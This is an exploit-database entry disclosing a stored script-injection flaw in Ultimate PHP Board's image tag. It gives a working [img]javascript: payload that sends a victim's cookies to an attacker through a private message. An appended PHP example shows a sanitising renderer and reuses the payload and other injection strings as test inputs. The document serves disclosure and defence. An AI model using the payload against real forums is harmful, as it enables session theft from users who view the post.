Exploit Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection

Exploiter

18 Dec 2022
EDB-ID: 21423
EDB verification: Passed
Author: FROG
Vulnerability type: WEBAPPS
Platform: PHP
CVE: null
Publication date: 2002-04-25
Code:
source: https://www.securityfocus.com/bid/4603/info

Ultimate PHP Board (UPB) is web forum software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

Ultimate PHP Board does not filter script code from image tags. This may allow an attacker to include script code in forum messages. Injected script code will be executed in the browser of an arbitrary web user who views the malicious forum message, in the context of the website running UPB.

It may be possible to inject script code into other UPB-Code formatting tags, though this has not been confirmed. 

[ img]javascript:window.open(' index.php?upb=pm&mode=send&send=yes&target_id=SONPROPREID&betreff=cookie&pm=' +document.cookie+ ' &smilies=1&use_upbcode=1&pmbox_id=IDDELAVICTIME&check=yes ')[/img ]
 
Source: www.exploit-db.com
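
The missing filter described in the advisory, sketched as a hardened `[img]` renderer. This is an added example, not UPB's code and not part of the original advisory; the function names `is_safe_image_url` and `render_img_tags`, the `forum.example` host and the sample posts are hypothetical. It escapes the whole post, then emits an `<img>` element only for absolute http(s) URLs, so a `javascript:` value stays inert text.

```php
<?php
// Added example: hypothetical [img] renderer, not UPB's own code.

function is_safe_image_url(string $url): bool
{
    // Reject whitespace and control characters, which browsers may strip
    // from inside a scheme ("java\tscript:") before interpreting it.
    if (preg_match('/[\x00-\x20\x7f]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // Allowlist of schemes instead of a blocklist of "javascript:".
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

function render_img_tags(string $post): string
{
    // Escape the whole post first so no raw user markup survives.
    $escaped = htmlspecialchars($post, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return preg_replace_callback(
        '/\[img\](.*?)\[\/img\]/is',
        function (array $m): string {
            // Validate the decoded value, but emit the escaped one.
            $url = html_entity_decode($m[1], ENT_QUOTES, 'UTF-8');
            if (!is_safe_image_url($url)) {
                return $m[0]; // leave the tag as inert, escaped text
            }
            return '<img src="' . $m[1] . '" alt="user image">';
        },
        $escaped
    ) ?? $escaped;
}

// Constructed sample posts: one legitimate image and three rejected values.
$samples = [
    '[img]https://forum.example/avatars/1.png[/img]',
    "[img]javascript:window.open('index.php?upb=pm&pm='+document.cookie)[/img]",
    '[img]JaVaScRiPt:alert(1)[/img]',
    '[img]https://forum.example/a.png" onerror="alert(1)[/img]',
];
foreach ($samples as $s) {
    echo render_img_tags($s), PHP_EOL;
}
```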